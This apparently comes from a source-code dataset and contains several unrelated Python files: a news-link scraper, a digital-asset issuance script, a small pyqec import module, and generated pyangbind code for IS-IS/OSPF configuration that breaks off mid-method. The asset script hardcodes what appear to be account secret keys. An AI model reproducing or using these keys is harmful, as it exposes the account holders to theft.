] | null | null | null | crawler/manual/news/missed_journals/google_links.py | bromjiri/Presto | e5790f60d0935bb1182f676db414b0724ba35c1b | [
"MIT"
] | null | null | null | crawler/manual/news/missed_journals/google_links.py | bromjiri/Presto | e5790f60d0935bb1182f676db414b0724ba35c1b | [
"MIT"
] | null | null | null | import re
# input
date = "2016-11-11"
output_file = date + "/links.txt"
write_output = open(output_file, "a")

# bbc
journal = "bbc"
for i in range(1, 4):
    file = date + "/" + journal + "/" + journal + str(i) + ".html"
    print(file)
    with open(file, "r") as f:
        for line in f:
            # print(line)
            matches = re.findall(r"http://www.bbc.co.uk/news/[A-Za-z0-9\-]*", line)
            if matches:
                unique = set(matches)
                for u in unique:
                    write_output.write(u + "\n")

# theguardian
journal = "theguardian"
for i in range(1, 4):
    file = date + "/" + journal + "/" + journal + str(i) + ".html"
    print(file)
    with open(file, "r") as f:
        for line in f:
            # print(line)
            matches = re.findall(r"https://www.theguardian.com[A-Za-z0-9\-/]*", line)
            if matches:
                unique = set(matches)
                for u in unique:
                    write_output.write(u + "\n")

# cnbc
journal = "cnbc"
for i in range(1, 4):
    file = date + "/" + journal + "/" + journal + str(i) + ".html"
    print(file)
    try:
        with open(file, "r") as f:
            for line in f:
                # print(line)
                matches = re.findall(r"http://www.cnbc.com.*?html", line)
                if matches:
                    unique = set(matches)
                    for u in unique:
                        write_output.write(u + "\n")
    except Exception as e:
        continue

# latimes
journal = "latimes"
for i in range(1, 4):
    file = date + "/" + journal + "/" + journal + str(i) + ".html"
    print(file)
    with open(file, "r") as f:
        for line in f:
            # print(line)
            matches = re.findall(r"http://www.latimes.com.*?html", line)
            if matches:
                unique = set(matches)
                for u in unique:
                    write_output.write(u + "\n")

# nytimes
journal = "nytimes"
for i in range(1, 4):
    file = date + "/" + journal + "/" + journal + str(i) + ".html"
    print(file)
    with open(file, "r") as f:
        for line in f:
            # print(line)
            matches = re.findall(r"http://www.nytimes.com.*?html", line)
            if matches:
                unique = set(matches)
                for u in unique:
                    write_output.write(u + "\n")
| 26.511111 | 85 | 0.476111 | 302 | 2,386 | 3.735099 | 0.182119 | 0.042553 | 0.026596 | 0.048759 | 0.776596 | 0.776596 | 0.776596 | 0.776596 | 0.776596 | 0.776596 | 0 | 0.014716 | 0.373428 | 2,386 | 89 | 86 | 26.808989 | 0.739799 | 0.042749 | 0 | 0.725806 | 0 | 0 | 0.118607 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.016129 | 0 | 0.016129 | 0.080645 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
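The per-journal loop in the row above repeats one core step: extract article URLs from an HTML line with `re.findall`, then deduplicate with `set` before writing. A minimal sketch of that step (the HTML snippet is made up for illustration):

```python
import re

# A line containing the same article link twice, as often happens in listings.
line = ('<a href="http://www.bbc.co.uk/news/world-123">headline</a> '
        '<a href="http://www.bbc.co.uk/news/world-123">thumbnail</a>')

# Same pattern as the bbc section above: match the URL prefix plus a slug.
matches = re.findall(r"http://www.bbc.co.uk/news/[A-Za-z0-9\-]*", line)

# findall returns every occurrence; set() drops the duplicate before writing.
unique = set(matches)
```

Note the pattern leaves `.` unescaped, so it also matches any character in those positions; escaping the dots (`www\.bbc\.co\.uk`) would be stricter.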
b857cb52a2d18c321b83b617599e112c8ffd9e7c | 7,844 | py | Python | tasks/issue_assets.py | link-money-dev/robot | 0d61c157c68ff074e51670431744a67a1de9f7da | [
"MIT"
] | null | null | null | tasks/issue_assets.py | link-money-dev/robot | 0d61c157c68ff074e51670431744a67a1de9f7da | [
"MIT"
] | 1 | 2021-06-01T22:34:45.000Z | 2021-06-01T22:34:45.000Z | tasks/issue_assets.py | link-money-dev/robot | 0d61c157c68ff074e51670431744a67a1de9f7da | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
# This module gives an example of issuing a digital asset.
# Issuing an asset requires two accounts: an issuing account and a distribution
# account; the newly issued asset ends up in the distribution account.
# In this example, the issued asset ends up in the `distributor` account.
# The issuing account:
# The distribution account:
import wrapper.client as CLIENT
import CONSTANT
constant=CONSTANT.Constant('public')
issuer_private_key_for_LINK='SDCCOAL6ILCJXWQPDZLRNHTMAHLZHC2IIHGPSQMLSIPHRTLNCFNT4A66'
issuer_address_for_LINK='GCA3SBI2Y6AYHLAW2GBTS7C5HTSFW6OTZACHOVJGBQ6JENTE3ZXPNNSL'
distributor_private_key_for_LINK='SCWDXYXEJL6GQWXUADDGFGFPF64ORWHXA7R2FNV4UVS6VIBIQCVD53JH'
distributor_address_for_LINK='GCONR7JZN7VUSFI54BS76VQJRWGUZDLQFPTB7DXHNP6E5KZECUW77VFL'
issuer_private_key_for_CNY='SBWATTQW5UDSVNZ7BVKX3DPR4EJFZCRUBYKRG5SMDESRSD5QWG7VSDQH'
issuer_address_for_CNY='GCNYF4V6CUY2XENJGRHLNB3AQE3RZIOWYHUN6YU5T34N3ZSK4KGCB7DD'
distributor_private_key_for_CNY='SCZVR6ZS3UKV3YHTK5YJJ3E7WD6RLWKJDPRTUNYQQ54BDFAYEQ4JDZ6S'
distributor_address_for_CNY='GB552GC4YLN7O7Z6DDDFOO7ZPK6374H4YZGZ4YJMWQW6HBRRAWNSIIQW'
issuer_private_key_for_OTHERS='SC53U46XXITEIDTDHLKUJAETF2JSLRQ6GKLMEYUAL3YO32EOKPXNFM44'
issuer_address_for_OTHERS='GBTCF6RETMMKZ6NKXIIAL5X3JZEZY2DPIIW77IZ6NWTNIUSAY37EQWAR'
distributor_private_key_for_OTHERS='SCZVR6ZS3UKV3YHTK5YJJ3E7WD6RLWKJDPRTUNYQQ54BDFAYEQ4JDZ6S'
distributor_address_for_OTHERS='GB552GC4YLN7O7Z6DDDFOO7ZPK6374H4YZGZ4YJMWQW6HBRRAWNSIIQW'
# issue LINK
issuer=CLIENT.Client(private_key=issuer_private_key_for_LINK, api_server=constant.API_SERVER)
distributor=CLIENT.Client(private_key=distributor_private_key_for_LINK, api_server=constant.API_SERVER)
result=issuer.issue_asset(distributor.private_key,asset_code='LINK',amount=1000000000)
print(result)
#
# # issue CNY
# issuer=CLIENT.Client(private_key=issuer_private_key_for_CNY, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_CNY, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='CNY',amount=10000000)
# print(result)
#
# # issue FX
# issuer=CLIENT.Client(private_key=issuer_private_key_for_CNY, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_CNY, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='FX',amount=21000000)
# print(result)
# issue Others
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='BTC',amount=21000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='ETH',amount=104000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# issuer = CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor = CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
#
# # Each (asset_code, amount) pair below was previously issued by an identical
# # copy-pasted block; the loop issues them with the same calls in the same order.
# assets = [
#     ('LTC', 84000000), ('XRP', 100000000000), ('BCH', 21000000),
#     ('EOS', 1000000000), ('XLM', 100000000000), ('USD', 2580000000),
#     ('ADA', 31000000000), ('XMR', 17000000), ('IOTA', 2700000000),
#     ('DASH', 18900000), ('TRX', 99000000000), ('NEO', 100000000),
#     ('ETC', 107000000), ('XEM', 8999999999), ('ZEC', 5000000),
#     ('MKR', 1000000),
# ]
# for asset_code, amount in assets:
#     result = issuer.issue_asset(distributor.private_key, asset_code=asset_code, amount=amount)
#     print(result) | 57.255474 | 107 | 0.865247 | 1,021 | 7,844 | 6.256611 | 0.079334 | 0.173763 | 0.097683 | 0.144646 | 0.784283 | 0.760019 | 0.760019 | 0.760019 | 0.760019 | 0.751409 | 0 | 0.042311 | 0.035824 | 7,844 | 137 | 108 | 57.255474 | 0.802327 | 0.787608 | 0 | 0 | 0 | 0 | 0.438303 | 0.431877 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b867e12732b3d3fca9f32535c7049b8ef51a45f6 | 136 | py | Python | pyqec/classical.py | maxtremblay/pyqec | 2815a85caf6e768686ec355f4abd6baa01c641d4 | [
"MIT"
] | 1 | 2021-01-27T17:02:39.000Z | 2021-01-27T17:02:39.000Z | pyqec/classical.py | maxtremblay/pyqec | 2815a85caf6e768686ec355f4abd6baa01c641d4 | [
"MIT"
] | 5 | 2021-02-25T15:45:26.000Z | 2021-05-26T14:16:48.000Z | pyqec/classical.py | maxtremblay/pyqec | 2815a85caf6e768686ec355f4abd6baa01c641d4 | [
"MIT"
] | 1 | 2021-05-26T08:14:05.000Z | 2021-05-26T08:14:05.000Z | from .pyqec import LinearCode, BinarySymmetricChannel, FlipDecoder
from .pyqec import random_regular_code, hamming_code, repetition_code | 68 | 69 | 0.875 | 16 | 136 | 7.1875 | 0.6875 | 0.156522 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080882 | 136 | 2 | 69 | 68 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b217d7d1df9c1bc97d99c61de65e1ea230838d31 | 28,259 | py | Python | pybind/slxos/v16r_1_00b/routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import match
class ospf(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-common-def - based on the path /routing-system/router/isis/router-isis-cmds-holder/address-family/ipv4/af-ipv4-unicast/af-ipv4-attributes/af-common-attributes/redistribute/ospf. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__match','__ospf_metric','__ospf_route_map','__ospf_level1','__ospf_level2','__ospf_level12','__ospf_metric_type',)
_yang_name = 'ospf'
_rest_name = 'ospf'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__ospf_metric = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4261412863']}), is_leaf=True, yang_name="ospf-metric", rest_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Metric for redistributed routes', u'cli-full-command': None, u'alt-name': u'metric'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='conn-metric', is_config=True)
self.__ospf_level12 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level12", rest_name="level-1-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level12'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1-2 routes', u'alt-name': u'level-1-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
self.__ospf_metric_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'internal': {'value': 1}, u'external': {'value': 2}},), default=unicode("internal"), is_leaf=True, yang_name="ospf-metric-type", rest_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IS-IS metric type for redistributed routes', u'alt-name': u'metric-type'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='is-metric-type-t', is_config=True)
self.__ospf_route_map = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..63']}), is_leaf=True, yang_name="ospf-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route map reference', u'cli-full-command': None, u'alt-name': u'route-map'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='rmap-type', is_config=True)
self.__ospf_level2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level2", rest_name="level-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-2 routes only', u'alt-name': u'level-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
self.__ospf_level1 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level1", rest_name="level-1", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level1'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1 routes only', u'alt-name': u'level-1', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
self.__match = YANGDynClass(base=match.match, is_container='container', presence=False, yang_name="match", rest_name="match", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Redistribution of OSPF routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'routing-system', u'router', u'isis', u'router-isis-cmds-holder', u'address-family', u'ipv4', u'af-ipv4-unicast', u'af-ipv4-attributes', u'af-common-attributes', u'redistribute', u'ospf']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'router', u'isis', u'address-family', u'ipv4', u'unicast', u'redistribute', u'ospf']
def _get_match(self):
"""
Getter method for match, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/match (container)
"""
return self.__match
def _set_match(self, v, load=False):
"""
Setter method for match, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/match (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_match is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_match() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=match.match, is_container='container', presence=False, yang_name="match", rest_name="match", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Redistribution of OSPF routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """match must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=match.match, is_container='container', presence=False, yang_name="match", rest_name="match", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Redistribution of OSPF routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='container', is_config=True)""",
})
self.__match = t
if hasattr(self, '_set'):
self._set()
def _unset_match(self):
self.__match = YANGDynClass(base=match.match, is_container='container', presence=False, yang_name="match", rest_name="match", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Redistribution of OSPF routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='container', is_config=True)
def _get_ospf_metric(self):
"""
Getter method for ospf_metric, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_metric (conn-metric)
"""
return self.__ospf_metric
def _set_ospf_metric(self, v, load=False):
"""
Setter method for ospf_metric, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_metric (conn-metric)
If this variable is read-only (config: false) in the
source YANG file, then _set_ospf_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ospf_metric() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4261412863']}), is_leaf=True, yang_name="ospf-metric", rest_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Metric for redistributed routes', u'cli-full-command': None, u'alt-name': u'metric'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='conn-metric', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ospf_metric must be of a type compatible with conn-metric""",
'defined-type': "brocade-isis:conn-metric",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4261412863']}), is_leaf=True, yang_name="ospf-metric", rest_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Metric for redistributed routes', u'cli-full-command': None, u'alt-name': u'metric'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='conn-metric', is_config=True)""",
})
self.__ospf_metric = t
if hasattr(self, '_set'):
self._set()
def _unset_ospf_metric(self):
self.__ospf_metric = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4261412863']}), is_leaf=True, yang_name="ospf-metric", rest_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Metric for redistributed routes', u'cli-full-command': None, u'alt-name': u'metric'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='conn-metric', is_config=True)
def _get_ospf_route_map(self):
"""
Getter method for ospf_route_map, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_route_map (rmap-type)
"""
return self.__ospf_route_map
def _set_ospf_route_map(self, v, load=False):
"""
Setter method for ospf_route_map, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_route_map (rmap-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_ospf_route_map is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ospf_route_map() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..63']}), is_leaf=True, yang_name="ospf-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route map reference', u'cli-full-command': None, u'alt-name': u'route-map'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='rmap-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ospf_route_map must be of a type compatible with rmap-type""",
'defined-type': "brocade-isis:rmap-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..63']}), is_leaf=True, yang_name="ospf-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route map reference', u'cli-full-command': None, u'alt-name': u'route-map'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='rmap-type', is_config=True)""",
})
self.__ospf_route_map = t
if hasattr(self, '_set'):
self._set()
def _unset_ospf_route_map(self):
self.__ospf_route_map = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..63']}), is_leaf=True, yang_name="ospf-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route map reference', u'cli-full-command': None, u'alt-name': u'route-map'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='rmap-type', is_config=True)
def _get_ospf_level1(self):
"""
Getter method for ospf_level1, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_level1 (empty)
"""
return self.__ospf_level1
def _set_ospf_level1(self, v, load=False):
"""
Setter method for ospf_level1, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_level1 (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_ospf_level1 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ospf_level1() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="ospf-level1", rest_name="level-1", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level1'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1 routes only', u'alt-name': u'level-1', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ospf_level1 must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level1", rest_name="level-1", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level1'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1 routes only', u'alt-name': u'level-1', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)""",
})
self.__ospf_level1 = t
if hasattr(self, '_set'):
self._set()
def _unset_ospf_level1(self):
self.__ospf_level1 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level1", rest_name="level-1", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level1'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1 routes only', u'alt-name': u'level-1', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
def _get_ospf_level2(self):
"""
Getter method for ospf_level2, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_level2 (empty)
"""
return self.__ospf_level2
def _set_ospf_level2(self, v, load=False):
"""
Setter method for ospf_level2, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_level2 (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_ospf_level2 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ospf_level2() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="ospf-level2", rest_name="level-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-2 routes only', u'alt-name': u'level-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ospf_level2 must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level2", rest_name="level-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-2 routes only', u'alt-name': u'level-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)""",
})
self.__ospf_level2 = t
if hasattr(self, '_set'):
self._set()
def _unset_ospf_level2(self):
self.__ospf_level2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level2", rest_name="level-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-2 routes only', u'alt-name': u'level-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
def _get_ospf_level12(self):
"""
Getter method for ospf_level12, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_level12 (empty)
"""
return self.__ospf_level12
def _set_ospf_level12(self, v, load=False):
"""
